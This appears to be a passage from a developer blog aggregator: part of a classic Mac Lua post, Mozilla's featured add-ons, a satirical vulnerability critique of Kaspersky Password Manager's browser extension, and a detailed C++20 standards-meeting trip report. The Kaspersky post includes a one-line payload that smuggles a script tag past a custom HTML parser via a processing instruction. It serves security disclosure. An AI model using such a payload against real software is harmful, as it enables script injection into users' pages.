You can still compile Lua natively on 10.4, and that would probably be more useful if you wanted to write Lua scripts on an OS X Power Mac, but if you have a 68K or beige Power Mac around this Lua port can run on systems as early as 7.1.2 (probably any 68020 System 7 Mac if you install the CFM-68K Runtime Enabler). I look forward to seeing how it evolves, and the fact that it was built with QEMU as a Mac emulator not only is good evidence of how functional QEMU's classic Mac emulation is getting but also means there may be a chance at some other ports to the classic Mac OS in the future.

Mozilla Addons BlogDecember’s Featured Extensions

Firefox Logo on blue background

Pick of the Month: Full Screen for Firefox

by Stefan vd
Go full screen with a single click.

“This is what I was searching for and now I have it!”

Featured: Context Search

by Olivier de Broqueville
Search highlighted text on any web page using your preferred search engine. Just right-click (or Shift-click) on the text to launch the context menu. You can also perform searches using keywords in the URL address bar.

“Great add-on and very helpful! Thank you for the good work.”

Featured: Behind the Overlay Revival

by Iván Ruvalcaba
Simply click a button to close annoying pop-up overlays.

“I don’t think I’ve ever reviewed an extension, but man, what a find. I get very sick of closing overlays and finding the little ‘x’ in some corner of it or some light colored ‘close’ link. They get sneakier and sneakier about making you actually read the overlay to find a way to close it. Now when I see one, I know right away I can click on the X in the toolbar and it will disappear. So satisfying.”

If you’d like to nominate an extension for featuring, please send it to amo-featured [at] mozilla [dot] org for the board’s consideration. We welcome you to submit your own add-on!

The post December’s Featured Extensions appeared first on Mozilla Add-ons Blog.

Wladimir PalantMaximizing password manager attack surface: Learning from Kaspersky

I looked at a number of password manager browser extensions already, and most of them have some obvious issues. Kaspersky Password Manager manages to stand out in the crowd however, the approach taken here is rather unique. You know how browser extensions are rather tough to exploit, with all that sandboxed JavaScript and restrictive default content security policy? Clearly, all that is meant for weaklings who don’t know how to write secure code, not the pros working at Kaspersky.

Kaspersky developers don’t like JavaScript, so they hand over control to their beloved C++ code as soon as possible. No stupid sandboxing, code is running with the privileges of the logged in user. No memory safety, dealing with buffer overflows is up to the developers. How they managed to do it? Browser extensions have that escape hatch called native messaging which allows connecting to an executable running on the user’s system. And that executable is what contains most of the logic in case of the Kaspersky Password Manager, with the browser extension being merely a dumb shell.

The extension uses website events to communicate with itself. As in: code running in the same scope (content script) uses events instead of direct calls. While seemingly pointless, this approach has a crucial advantage: it allows websites to mess with the communication and essentially make calls into the password manager’s executable. Because, if this communication channel weren’t open to websites, how could the developers possibly prove that they are capable of securing their application?

Now I’m pretty bad at reverse engineering binary code. But I managed to identify large chunks of custom-written code that can be triggered by websites more or less directly:

  • JSON parser
  • HTML parser
  • Neuronal network

While the JSON parser is required by the native messaging protocol, you are probably wondering what the other two chunks are doing in the executable. After all, the browser already has a perfectly capable HTML parser. But why rely on it? Analyzing page structure to recognize login forms would have been too easy in the browser. Instead, the browser extension serializes the page back to HTML (with some additional attributes, e.g. to point out whether a particular field is visible) and sends it to the executable. The executable parses it, makes the neuronal network analyze the result and tells the extension which fields need to be filled with what values.

Doesn’t sound like proper attack surface maximization because serialized HTML code will always be well-formed? No problem, the HTML parser has its limitations. For example, it doesn’t know XML processing instructions and will treat them like regular tags. And document.createProcessingInstruction("foo", "><script/src=x>") is serialized as <?foo ><script/src=x>?>, so now the HTML parser will be processing HTML code that is no longer well-formed.

This was your quick overview, hope you learned a thing or two about maximizing the attack surface. Of course, you should only do that if you are a real pro and aren’t afraid of hardening your application against attacks!

Botond BalloTrip Report: C++ Standards Meeting in San Diego, November 2018

Summary / TL;DR

<!–

–>

Project What’s in it? Status
C++17 See list Published!
C++20 See below On track
Library Fundamentals TS v3 See below Under active development
Concepts TS Constrained templates Merged into C++20, including (now) abbreviated function templates!
Parallelism TS v2 Task blocks, library vector types and algorithms, and more Published!
Executors Abstraction for where/how code runs in a concurrent context Subset headed for C++20, rest in C++23
Concurrency TS v2 See below Under development. Depends on Executors.
Networking TS Sockets library based on Boost.ASIO Published! Not headed for C++20.
Ranges TS Range-based algorithms and views Merged into C++20!
Coroutines TS Resumable functions, based on Microsoft’s await design Published! C++20 merge uncertain
Modules v1 A component system to supersede the textual header file inclusion model Published as a TS
Modules v2 Improvements to Modules v1, including a better transition path On track to be merged into C++20
Numerics TS Various numerical facilities Under active development
Graphics TS 2D drawing API Future uncertain
Reflection TS Static code reflection mechanisms PDTS ballot underway; publication expected in early 2019

A few links in this blog post may not resolve until the committee’s post-meeting mailing is published (expected any day now). If you encounter such a link, please check back in a few days.

Introduction

A few weeks ago I attended a meeting of the ISO C++ Standards Committee (also known as WG21) in San Diego, California. This was the third committee meeting in 2018; you can find my reports on preceding meetings here (June 2018, Rapperswil) and here (March 2018, Jacksonville), and earlier ones linked from those. These reports, particularly the Rapperswil one, provide useful context for this post.

This meeting broke records (by a significant margin) for both attendance (~180 people) and number of proposals submitted (~270). I think several factors contributed to this. First, the meeting was in California, for the first time in the five years that I’ve been attending meetings, thus making it easier to attend for Bay Area techies who weren’t up for farther travels. Second, we are at the phase of the C++20 cycle where the door is closing for new proposals targeting to C++20, so for people wanting to get features into C++20, it was now or never. Finally, there has been a general trend of growing interest in participation in C++ standardization, and thus attendance has been rising even independently of other factors.

This meeting was heavily focused on C++20. As discussed in the committee’s standardization schedule document, this was the last meeting to hear new proposals targeting C++20, and the last meeting for language features with significant library impact to gain design approval. A secondary focus was on in-flight Technical Specifications, such as Library Fundamentals v3.

To accommodate the unprecedented volume of new proposals, there has also been a procedural change at this meeting. Two new subgroups were formed: Evolution Incubator (“EWGI”) and Library Evolution Incubator (“LEWGI”), which would look at new proposals for language and library changes (respectively) before forwarding them to the Evolution or Library Evolution Working Groups (EWG and LEWG). The main purpose of the incubators is to reduce the workload on the main Evolution groups by pre-filtering proposals that need additional work before being productively reviewed by those groups. A secondary benefit was to allow the attendees to be spread out across more groups, as otherwise EWG and LEWG would have likely exceeded their room capacities.

C++20

Here are the new changes voted into C++20 Working Draft at this meeting. For a list of changes voted in at previous meetings, see my Rapperswil report.

Technical Specifications

In addition to the C++ International Standard (IS), the committee publishes Technical Specifications (TS) which can be thought of experimental “feature branches”, where provisional specifications for new language or library features are published and the C++ community is invited to try them out and provide feedback before final standardization.

At this meeting, the committee iterated on a number of TSes under development.

Reflection TS

The Reflection TS was sent out for its PDTS ballot at the last meeting. As described in previous reports, this is a process where a draft specification is circulated to national standards bodies, who have an opportunity to provide feedback on it. The committee can then make revisions based on the feedback, prior to final publication.

The PDTS ballot is still ongoing, so there wasn’t much to do on this front at this meeting. We expect the ballot results to be ready by the next meeting (February 2019, in Kona), at which time we’ll address the ballot comments and, time permitting, approve the revised TS for publication.

One minor snafu discovered at this meeting is that prior to the PDTS ballot, the Reflection TS, which depends on Concepts, has been rebased onto C++20, to take advantage of C++20 Concepts (previously, it was based on the Concepts TS). Unfortunately, ISO rules don’t allow publishing a TS before its base document is published, which means that to publish the Reflection TS as-is, we’d have to wait to do it concurrently with the C++20 publication in late 2020. We very much don’t want to wait that long, since the purpose of the Reflection TS is to gather feedback from users in preparation for revised Reflection features in C++23, and the earlier we start getting that feedback, the better. So, we’ll have to un-rebase the Reflection TS onto {C++17 + Concepts TS} to be able to publish it in early 2019 as planned. Isn’t red tape fun?

Library Fundamentals TS v3

This third iteration (v3) of the Library Fundamentals TS is open for new features to be added. (The TS working draft currently contains features from v2 which haven’t been merged into the C++ IS yet.) The only changes voted in at this meeting were a rebase and some issue resolutions, but a number of new features are on the way.

Executors

As discussed below, the revised plans for Executors are for a subset of them to target C++20, and the rest C++23. An Executors TS is not planned at this time.

Merging Technical Specifications into C++20

Turning now to Technical Specifications that have already been published, but not yet merged into the IS, the C++ community is eager to see some of these merge into C++20, thereby officially standardizing the features they contain.

Ranges TS

The Ranges TS modernizes and Conceptifies significant parts of the standard library (the parts related to algorithms and iterators), as well as introducing exciting new features such as range views.

After years of hard work developing these features and going through the TS process, the Ranges TS was finally merged into C++20, paving the way for wider adoption of these features.

Concepts TS

The approval of abbreviated function templates for C++20 at this meeting can be thought of as completing the merge of the Concepts TS into C++20: all the major features in the TS have now been merged, with some design modifications inspired by implementer and user feedback.

While the journey took longer than was initially hoped, in my opinion Concepts is a better feature for the design changes made relative to the Concepts TS, and as such this is an example of the TS process working as intended.

Modules TS

Modules remains one of the most highly anticipated features by the C++ user community. This meeting saw really good progress on Modules: a “merged” Modules design, combining aspects of the Modules TS and the alternative Atom proposal, gained design approval for C++20.

This outcome exceeded expectations in that previously, the merged proposal seemed more likely to target a Modules TS v2 or C++23, with a subset possibly targeting C++20; however, thanks in significant part to the special one-off Modules-focused Bellevue meeting in September, good enough progress was made on the merged design that the authors were comfortable proposing putting the entire thing into C++20, which EWG subsequently approved.

As this is a large proposal, wording review by the Core Working Group will take some time, and as such, a plenary vote to merge the reviewed wording into the C++20 working draft won’t take place until the next meeting or the one after; however, as all the major compiler implementers seem to be on board with this design, and there is overwhelming demand for the feature from the user community, I expect smooth sailing for that vote.

In fewer words: Modules is on track for C++20!

Coroutines TS

The Coroutines TS was once again proposed for merger into C++20 at this meeting. This is the third time this proposal was made (the other two times being at the previous two meetings). At the last meeting, the proposal got as far as a plenary vote at the end of the week, which narrowly failed.

The opposition to merging the TS into C++20 comes from the fact that a number of people have concerns about the Coroutines TS design (some of them are summarized in this paper), and an alternative proposal that addresses these concerns (called “Core Coroutines”) is under active development. Unfortunately, Core Coroutines is not sufficiently-baked to make C++20, so going with it would mean delaying Coroutines until C++23. Opinions differ on whether this is a worthwhile tradeoff: the Core Coroutines authors are of the view that C++ will remain a relevant language for 50 years or more, and waiting 3 years to improve a feature’s design is worthwhile; others have made it clear that they want Coroutines yesterday.

After the failure of last meeting’s merger proposal, it was hoped that waiting one more meeting would allow for the Core Coroutines proposal to mature a bit. While we knew it wouldn’t be ready for C++20, we figured the added maturity would allow us to better understand what we would be giving up by merging the Coroutines TS into C++20, and possibly identify changes we could make the Coroutines TS before C++20’s publication that would make incremental improvements inspired by Core Coroutines backwards-compatible, thereby allowing us to make a more informed decision on the C++20 merger.

Core Coroutines did make significant progress since the last meeting: the updated proposal is simpler, more fleshed out, and has a cleaner syntax. The impasse has also inspired efforts, led by Facebook, to combine the two proposals in such a way that would unblock the merger into C++20, and allow for backwards-comaptible improvements achieving many of the goals of Core Coroutines in C++23, but these efforts are at a relatively early stage (a paper describing the combined design in detail was circulated for the first time while the meeting was underway).

Ultimately, waiting a meeting doesn’t seem to have changed many people’s minds, and we saw a replay of what happened in Rapperswil: EWG narrowly passed the merger, and plenary narrowly rejected it; interestingly, the level of consensus in plenary appears to have decreased slightly since Rapperswil.

To keep C++20 on schedule, the final deadline for approving a TS merger is the next meeting, at Kona. The merger will undoubtedly be re-proposed then, and there remains some optimism that further development of Facebook’s combined proposal might allow us to gain the required confidence in a future evolution path to approve the merger for C++20; otherwise, we’re looking at getting Coroutines in C++23.

Networking TS

It’s looking like the Networking TS will not be merged into C++20, in large part due to the concerns presented this paper discussing usage experience. The TS will instead target C++23.

Evolution Working Group

With the increased number of subgroups meeting in parallel, it’s becoming more challenging to follow what goes on in the committee.

I usually sit in EWG for the duration of the meeting, and summarize the design discussions that take place in that group. I will try to do so again, but I did miss some EWG time while sitting in some study group meetings and Evolution Incubator meetings, so expect some reduction in the amount of detail. If you have specific questions that I didn’t cover, feel free to ask in the comments.

This time, I’ll categorize proposals by topic. For your convenience, I still indicate whether each proposal was approved, had further work on it encouraged, or rejected. Proposals are targeting C++20 unless otherwise mentioned.

Concepts

The headline item here is the approval of the compromise design for abbreviated function templates (AFTs). With this syntax, AFTs look like this:

void f(Concept auto x);

This makes both the “I want to write a function template without the template<...> notation” and the “I want to be able to tell syntactically if a function is a template” camps happy (the latter because the auto tells you the parameter has a deduced type, and therefore the function is a template).

You can also use Concept auto as a return type, and as the type of a variable. In each case, the type is deduced, and the deduced type has to satisy the concept. The paper as written would have allowed the return type and variable cases to omit the auto, but this didn’t have consensus and was removed.

Note that you can write just void f(auto x); as well, making functions consistent with lambdas which could already do this.

Finally, as part of this change, a restriction was imposed on the template <Concept T> notation, that T has to be a type. For non-type and template template parameters, constraints can only be specified using a requires-clause. The motivation here is to be able to tell syntactically what type of entity T is.

A few other Concepts-related proposals were looked at:

  • (Further work) How to make terse notation soar with class template argument deduction. The idea here is to combine class template argument deduction (CTAD) and Concepts such that a class template name (e.g. tuple) can be used as a parameter type as if it were a concept (with the concept being, roughly, “this type is a specialization of tuple“). The proposal was generally well-received, but there are some technical details to iron out, and design alternatives to consider (e.g. spelling it tuple<auto...>), so this will be revisited for C++23.
  • (Rejected) A simple proposal for unifying generic and object-oriented programming. This is a more ambitious proposal to try to allow writing code that works with a set of polymorphic types, that looks the same regardless of whether the polymorphism is dynamic (inheritance) or static (concepts). Reception was mixed; some felt this would introduce a new programming model with relatively little benefit.
  • (Rejected) Concept-defined placeholder types. This would have allowed defining a “placeholder type” constained by a concept, and using that type in place of the concept. It didn’t really fit with the AFT design that was approved.
  • (Rejected) Multi-argument constrained parameter. This proposed a whitespace-based syntax for introducing multiple constrained parameters in a template parameter list, e.g. template <EqualityComparableWith T U>. EWG didn’t feel the whitespace syntax was an improvement over other syntaxes that have been rejected, like template <EqualityComparableWith{T, U}>.

EWG ran out of time to review the updated “constraining Concepts overload sets” proposal. However, there was some informal speculation that the chances of this proposal making C++20 have diminished, because the proposal has grown a lot more complex in an attempt to address EWG’s feedback on the previous version, which suggests that feedback had touched on some hard problems that we may not be in a good position to solve at this time.

Modules

As mentioned, perhaps the biggest high-point of this meeting was EWG’s approval of the merged Modules design for C++20. “Merged” here refers to the proposal combining aspects of the Modules TS design, and the alternative Atom proposal. Perhaps most significantly, the design borrows the Atom proposal’s legacy header imports feature, which is intended to better facilitate incremental transition of existing large codebases to Modules.

Several minor modifications to this design and related changes were also proposed:

  • (Approved) Making module a context-sensitive keyword, take two. Following consistent feedback from many segments of the user community that making module a hard keyword would break too much code, a new proposal for making it context-sensitive, this time with simpler disambiguation rules, was approved.
  • (Approved) Single-file modules with the Atom semantic properties rule. This allows module authors to do certain things that previously required separate module partitions in separate files, in one file.
  • (Approved) Module preamble is unnecessarily fragile. This tweaks the rules for where a module file’s “preamble” (the area containing the module declaration and imports) ends, with a view to making the user model simpler.
  • (Approved) Redefinitions in legacy imports. This clarifies some of the rules in scenarios involving legacy header imports.
  • (Further work) Modules and freestanding. This mostly has to do with how to split the standard library into modules, with the relevance to EWG being that we should have a consistent approach for dealing with freestanding implementations in the language and in the library. EWG did not reach a consensus on this topic, mostly because there are a wide variety of freestanding environments with different constraints, and a single subset of the language does not fit all of them.
  • (Further work) Inline module partitions. This is a generalization of “Single-file modules with the Atom semantic properties rule”, which would allow defining an arbitirary number of module partitions “inline” in a single file. EWG encouraged further development of this idea, but for post-C++20.
  • (Rejected) Global module fragment is unnecessary. The global module fragment is one of two mechanisms for transitioning existing code to Modules (the other being legacy header imports). The author of this paper suggested that just legacy header imports may be sufficient, but this was emphatically argued against based on implementation experience at some companies, leading to the proposal’s rejection.
  • (Rejected) Retiring pernicious language constructs in module contexts. This paper suggested that Modules was an opportunity to shed some of the language’s legacy cruft by making certain constructs invalid inside a module (while they would remain valid in non-modular code for backwards compatibility). There wasn’t much enthusiasm for this idea, largely because it’s expected that people will want to be able to freely copy / migrate code from a non-modular context to a modular context and vice versa.

Contracts

  • (Approved) Access control in contract conditions. This was the subject of a very long and drawn-out debate on the committee mailing lists which I won’t attempt to summarize, but the outcome was that pre- and post-conditions on member functions can reference private and protected variables inside the class, even though we think of them as being part of the class’s public interface.
  • (Approved) Contract postconditions and return type deduction. This is a tweak regarding the interaction between postconditions and return type deduction, with the intention to avoid surprising behaviour. Option 3 from the paper had consensus.
  • (Further work) Allowing contract predicates on non-first declarations. EWG was open to this idea, but some implementation issues (such as who emits the code for the contract check) need to be ironed out.
  • (Further work) Undefined behaviour in contract violations. This was another topic that engendered very extensive mailing list discussion. No decision was made this week, but the likely direction is to specify that contracts (except perhaps axioms) do not allow compilers to assume additional things they couldn’t already assume.
  • (Rejected) Contracts updates. Of the three minor changes proposed in this paper, the first was a trivial wording change (which was approved); the second had no consensus; and the third was deemed unimplementable.

constexpr

Continuing with the committee’s concerted effort to make clunkier forms of compile-time programming (such as template metaprogramming) unnecessary, EWG approved further extensions to constexpr:

Coroutines

I mentioned above that EWG narrowly passed the latest version of a proposal to merge the Coroutines TS into C++20, only to have it rejected in a plenary vote.

The technical discussion of this topic centred around an updated version of the competing Core Coroutines proposal, and a paper by Facebook engineers arguing that most of the benefits of Core Coroutines could be achieved through extensions to the Coroutines TS, and we should therefore go ahead with the Coroutines TS in C++20.

An interesting development that emerged mid-meeting is the Facebook folks coming up with a “unified coroutines” proposal that aims to achieve consensus by combining aspects of the two competing proposals. There wasn’t really enough time for the committee to digest this proposal, but we are all hopeful it will help us make an informed final decision (final for C++20, that is) at the next meeting.

Structured Bindings

  • (Approved in part) Extend structured bindings to be more like variable declarations. Structured bindings can now be static, thread_local, or constexpr; in each case, this applies to the entire composite object being destructured. Rules around linkage were also clarified. Capture of bindings by a lambda was deferred for further work.
  • (Further work) Simplify the customization point for structured bindings. EWG wholehearted wants an overhaul of the customization point (the current one just piggybacks on the customization point for tuple-like that we already had in the language), but felt this proposal addressed just one piece of what is a larger puzzle. A more complete proposal may look something like the operator extract from an earlier pattern matching proposal.
  • (Rejected) Structured bindings with explicit types. This was rejected because the use cases will be addressed more comprehensively with pattern matching.

Class Template Argument Deduction (CTAD)

  • (Approved in part) Filling holes in class template argument deduction. CTAD now works with aggregates, alias templates, and inheriting constructors. Making CTAD work with partial template argument lists was rejected because it would be a breaking change in some cases (e.g. consider vector<any>(MyAlloc())).
  • (Rejected) Improving function templates with CTAD. EWG found that this would involve a lot of complexity, since with function templates you don’t just have one template definition as with class templates, but a whole overload set.

Comparisons

Most comparison-related proposals involved early adopters trying out the spaceship operator (<=>) and discovering problems with it.

  • (Approved) I did not order this! Why is it on my bill?, which probably deserves a medal of some sort for most creative paper title. (Explanation: the paper concerns scenarios where you don’t care about ordering your type, only equality-comparing it, you implement a defaulted operator<=> (because that’s “the C++20 way” for all comparison use cases), and you pay a performance penalty that wouldn’t be there with hand-written code to deal with equality comparison only.) A related paper offers a solution, which is along the lines of making == be its own thing and not fall back to using <=>, since that’s where the inefficiency stems from (for types like string, if the lengths are different you can answer “not equal” much faster than if you’d have to answer “less” or “greater than”). A second part of the proposal, where a defaulted <=> would also generate a defaulted ==, so that users can be largely oblivious to this problem and just default one operator (<=>), was more controversial, but was still approved over some objections.
  • (Approved) When do you actually use <=>? The crux of this paper is that we’ve had to invent a library function compare_3way() wrapping <=> and that’s what we want to use most of the time, so we should just give <=> the semantics of that function.
  • (Mooted) weak_equality considered harmful. This proposal has become moot as implementations of == are no longer generated in terms of <=>. (As a result, weak_equality and strong_equality are no longer used and will likely be removed in the future.)
  • (Rejected) Chaining comparisons. Despite previous encouragement, this was now rejected due to concerns about teachability and implementation issues.

Other New Features

  • (Further work) Deducing this. This proposal allows writing member functions where the type of this is deduced, thereby eliminating the need to duplicate implementations for things like const vs. non-const objects, and other sources of pain. There was a fair amount of technical discussion concerning recursive lambdas (which this proposal hopes to enable), name lookup rules, and other semantic details. The authors will return with a revised proposal.
  • (Rejected) Towards a lazy forwarding mechanism for C++. This would allow declaring function parameters to be “lazy”, such that their arguments are evaluated upon their use inside the function (and possibly not at all if there is no use), rather than at the call site; participants pointed out a similarity to Algol’s “call by name” feature. EWG wasn’t categorically opposed to the notion of lazy parameters, but the notion of having them without any call-site syntax (like this paper proposes) was controversial.

Bug / Consistency Fixes

(Disclaimer: don’t read too much into the categorization here. One person’s bug fix is another’s feature.)

  • (Approved) Allow initializing aggregates from a parenthesized list of values. This finally allows things like vector::emplace_back() to work for aggregates.
  • (Approved) Contra CWG DR1778. This has to do with noexcept and explicitly defaulted functions. The first option from the paper was approved.
  • (Approved) Permit conversions to arrays of unknown bound. The motivation cited for this is working in environments where dynamic allocation is not allowed and use of pointers is restricted, and thus passing around variable-length arrays as arrays of unknown bound are the only way to work with dynamically sized data ranges.
  • (Approved) Array size deduction in new-expressions. This is a minor consistency fix that was also approved as a Defect Report against older language versions.
  • (Approved) Nested inline namespaces. This allows using the C++17 nested namespace syntax in cases where one or more of the namespaces are inline. Example: namespace foo::inline bar::baz { } is short for namespace foo { inline namespace bar { namespace baz { }}}. inline is not allowed in the leading position as people might mistakenly think it applies to the innermost namespace.
  • (Further work) Conditionally trivial special member functions. This is a small but important fix for library implementers who would otherwise have to use labour-intensive techniques to meet the triviality requirements set out for standard library types. This was essentially approved, but specification difficulties necessitate one more round of review.
  • (Further work) Ultimate copy elision. This aims to expand the set of scenarios in which the compiler is allowed to elide copies and moves (note: unlike the C++17 “guaranteed copy elision” feature, this is not requiring compilers to elide copies in these new scenarios, just allowing them). EWG liked the general idea but had concerns about the potential for code breakage in some scenarios.
  • (Further work) Adding the [[constinit]] attribute. The motivation here is cases where you want to guarantee that a variable’s initial value is computed at compile time (so no dynamic initialization required), without making the variable const (so that you can assign new values to it at runtime). EWG liked the idea but preferred using a keyword rather than an attribute. An alternative to decorate the initializer rather than the variable had no consensus.
  • (Postponed) short float. This proposal continues to face challenges due to concerns about different implementations using different sizes for it, or even different representations within the same size (number of bits in mantissa vs. exponent). As a result, there was no consensus for moving forward with it for C++20. There remains strong interest in the topic, so I expect it will come back for C++23, possibly under a different name (such as float16_t instead of short float, to specify the size more concretely).
  • (Rejected) Deprecate the addressof operator. This proposes to deprecate the overloading of operator &. EWG didn’t feel that removal was realistic given that we don’t have a good handle on the breadth of usage in the wild, and didn’t want to entertain deprecation without an intention to remove as a follow-up.

Evolution Working Group Incubator

As mentioned above, due to the increased quantity of proposals, an “EWG Incubator” group (EWGI) was also spun up to do a preliminary round of review on some proposals that EWG couldn’t get to this week, in the hope of making them better-baked for their eventual EWG review at a future meeting.

I only attended EWGI for half a day, so I don’t have much to report about the discussions that went on, but I will list the papers the group forwarded to EWG:

There were also a couple of papers EWGI referred for EWG review not necessarily because they’re sufficiently baked, but because they would benefit from evaluation by a larger group:

Numerous other proposals were asked to return to EWGI with revisions. I’ll call out a couple:

  • There were two proposals for pattern matching. The feature had strong support, and the authors were asked to return with a combined proposal.
  • There was another attempt at named arguments (called “labelled parameters” in the proposal). The novelty in this approach was putting the names in the type system, but without actually modifying any semantic rules like overload resolution, by encoding the labels using existing mechanisms in the type system, and then layering a “sugar” syntax on top. EWGI’s feedback was that the attempted abstraction will leak, and we’ll have to end up making deeper modifications to the type system after all, to have a usable feature. Encouragement to return was weak but existent.

Papers not discussed

There were, of course, also papers that neither EWG nor EWGI had the time to look at during this meeting; among them was Herb’s static exceptions proposal, which is widely anticipated, but not targeting C++20.

I’ll also briefly mention the lifetimebound proposal which Mozillians have expressed a particular interest in due to the increased lifetime safety it would bring: the authors feel that Microsoft’s lifetime checker, whose model of operation is now described in a paper is doing an adequate job of satisfying this use case outside of the core language rules (via annotations + a separate static checker). Microsoft’s lifetime checker ships with MSVC, and has a work-in-progress implementation in Clang as well, which can be tried out in Compiler Explorer, and will hopefully be open-sourced soon. See also Roc’s blog post on this subject.

Other Working Groups

Library Groups

Having sat in the Evolution groups, I haven’t been able to follow the Library groups in any amount of detail, but I’ll call out some of the more notable library proposals that have gained design approval at this meeting:

And a few notable proposals which are still undergoing design review, and are being treated with priority:

There are numerous other proposals in both categories above, I’m just calling out a few that seem particularly noteworthy. Please see the committee’s website for a full list of proposals.

Study Groups

SG 1 (Concurrency)

Most of the C++20-track work (jthread, Executors subset, synchronization omnibus paper, memory model fixes) has progressed out of the Concurrency Study Group and is mentioned above.

For Executors, the current plan is to put a subset of the unified proposal (specifically including “one way” and “bulk one way” executors, but not the other kinds) into C++20, and the rest into C++23; a TS is not planned at this time.

Coroutines-related library additions are not being reviewed yet; they need more bake time, and integration with the next revision of Executors.

SG 1 has opinions on freestanding implementations: they feel omitting thread_local from a freestanding implementation is fine, but omitting non-lock-free atomics or thread-safe statics is more controversial.

SG 7 (Compile-Time Programming)

There were two meetings related to compile-time programming this week. The first was an evening session where the committee re-affirmed its preference for constexpr-based metaprogramming as the future of C++ metaprogramming, in preference to template metaprogramming (TMP). (There was some confusion in this regard, as there was a proposal to standardize Boost.Mp11, a TMP library. The feeling at the end of the meeting was that with constexpr metaprogramming just around the corner, it’s probably not the best use of committee time to standardize a TMP library.)

The second was an afternoon meeting of SG 7, where the main agenda item was reviewing two proposals for reflection based on constexpr metaprogramming: constexpr reflexpr, and scalable reflection in C++. The first is by the authors of the Reflection TS, and tries to carry over the Reflection TS facilities to the land of constexpr in a relatively straightforward way. The second is a variation of this approach that reflects experience gained from experimentation by some implementers. Both proposals also go further than the Reflection TS in functionality, by supporting reification, which involves going from meta-objects obtained via reflection back to the entities they represent.

One notable difference between the two proposals is that the first uses meta-objects of different types to represent different kinds of entities (e.g. meta::variable, meta::function, etc.), whereas the second uses just one type (meta::info) for all meta-objects, and requires using operations on them (e.g. is_variable()) to discriminate. The authors of the second proposal claim this is necessary for compile-time performance to be manageable; however, from an interface point of view the group preferred the different-types approach, and some implementers thought the performance issues could be solved. At the same time, there was agreement that while there should be different types, they should not form an inheritance hierarchy, but rather be type-erased by-value wrappers. In addition, the group felt that errors should be visible in the type system; that is, rather than having meta-objects admit an invalid state, reflection operations that can fail should return something like expected<meta::info> instead.

The target ship vehicle for a constexpr-based reflection facility is not set in stone yet, but people are hopeful for C++23.

In addition, SG 7 approved some guidelines for what kinds of library proposals should require SG 7 review.

SG 13 (Human/Machine Interface)

The Human/Machine Interface Study Group (SG 13) deals with proposals for graphics, event handling, and other forms of user interaction.

Its main product so far has been the 2D graphics proposal, which had been making good progress until it lost consensus to move forward at the last meeting. As there was still significant interest in this proposal in many user communities (see e.g. this paper arguing strongly for it), the Convenor asked SG 13 to have another look at it, to see if consensus could somehow be re-attained. There wasn’t extensive technical discussion of the proposal at this meeting, but we did go over some feedback from potential implementers; it was suggested that the author and other interested parties spend some time talking to graphics experts, many of whom are found in the Bay area (though not the ones at Mozilla – our graphics folks are mostly in the Toronto office).

The group also discussed the web_view proposal, which was positioned as an alternative to rolling our own graphics API. As the proposal effectively involves shipping a web platform implementation as part of the C++ standard library, this proposal has a lot of relevance to Mozilla. As such, I solicited feedback on it on Mozilla’s platform mailing list, and the feedback was pretty universally that this is not a good fit for the C++ standard library. I relayed this feedback at this meeting; nonetheless, the group as a whole was in favour of continuing to pursue this proposal. In fact, the group felt this and 2D graphics serve different use cases and should both be pursued in parallel. (Admittedly, there’s some selection bias going on here: people who choose to attend a meeting of SG 13 are naturally likely to be in favour of proposals in this topic area. I’m curious to see how these proposals will fare in front of a larger voting audience.)

There was also some general discussion of other topics in scope for this group. There are plans for bring forward a proposal for an audio API, and there were also ideas thrown around about things like event handling, user input, sensors, and VR.

SG 15 (Tooling)

The Tooling Study Group (SG 15) met for an evening session, and numerous papers concerning a variety of topics were presented.

The most pressing topic was how to integrate Modules with build systems. The problem is nicely summarized in this paper, and proposed solutions range from a separate “module mapper” component to relying on conventions.

The other major topic was general discussion about where to go in the space of dependency and package management. Ideas presented here include a set of APIs to allow components of a package ecosystem to interface with each other without requiring a particular implementation for any one component, and ideas around package specification.

I don’t feel like a lot of decisions were made in this session, and the group as a whole seems to be conflicted about what its role is given that these areas are not in the purview of the C++ standards document itself, but I still think the evening served as a valuable opportunity for pioneers in these areas to exchange areas and build mindshare around the tooling problems facing the C++ community.

Other Study Groups

Other Study Groups that met at this meeting include:

  • SG 6 (Numerics), which met for about a day and a half and reviewed a dozen or so proposals
  • SG 12 (Undefined and Unspecified Behaviour), which met both on its own (largely due discuss Contracts) and in joint session with WG23 – Software Vulnerabilities (where the focus was on vulnerabilities related to control structures)
  • SG 16 (Unicode), for which this was the first in-person meeting. The group approved a set of high-level priorities in addition to reviewing several specific proposals.

Freestanding Implementations

Not a study group, but this didn’t really fit anywhere else: there was an evening session to try to clarify the committee’s approach to freestanding implementations.

Freestanding implementations are, roughly speaking, those which cannot assume the presence of a full complement of operating system services, because they’re e.g. targeting kernel code or other “bare metal” scenarios; such implementations cannot practically make use of all language features, such as exceptions.

The standard currently defines a subset of the library that is intended to be supported on freestanding implementations, but defines no such subset for the language. Attempts to define such a subset tend to be stymied by the fact that different environments have different constraints, so one subset does not fit all.

The session didn’t reach any firm conclusions, but one possible direction is to avoid trying to define subsets, and instead make it easier for target environments to not use features of the language that are not applicable or practical for it.

New Study Groups

Two new Study Groups were announced at this meeting. Quoting their charters from Herb Sutter’s trip report:

SG 19 (Machine Learning):

We feel we can leverage C++’s strengths in generic programming, optimization and acceleration, as well as code portability, for the specific domain of Machine Learning. The aim of SG19 is to address and improve on C++’s ability to support fast iteration, better support for array, matrix, linear algebra, in memory passing of data for computation, scaling, and graphing, as well as optimization for graph programming.

SG 20 (Education):

We feel we have an opportunity to improve the quality of C++ education, to help software developers correctly use our language and ecosystem to write correct, maintainable, and performing software. SG20 aims to create curriculum guidelines for various levels of expertise and application domains, and to stimulate WG21 paper writers to include advise on how to teach the new feature they are proposing to add to the standard.

Next Meetings

The next meeting of the Committee will be in Kona, Hawaii, the week of February 18th, 2019.

Conclusion

C++ standards development continues to progress at an unprecedented pace. My highlights for this meeting included:

  • Modules gaining design approval to go into C++20
  • Abbreviated function templates reaching consensus, to round out Concepts in C++20
  • Ranges being voted into the C++20 working draft
  • Coroutines continuing to progress towards a unified design that can hopefully achieve consensus

With the big-ticket items above, not to mention Contracts, operator spaceship, and many other goodies, C++20 is shaping up to be a very impressive release!

Due to sheer number of proposals, there is a lot I didn’t cover in this post; if you’re curious about a specific proposal that I didn’t mention, please feel free to ask about it in the comments.

Other Trip Reports

In addition to Herb’s, other trip reports about this meeting include Corentin Jabot’s, a collaborative Reddit report, and a podcast focused on Library Evolution by Ashley Hedberg. I encourage you to check them out as well!

Mark CôtéA Tale of Two Commits

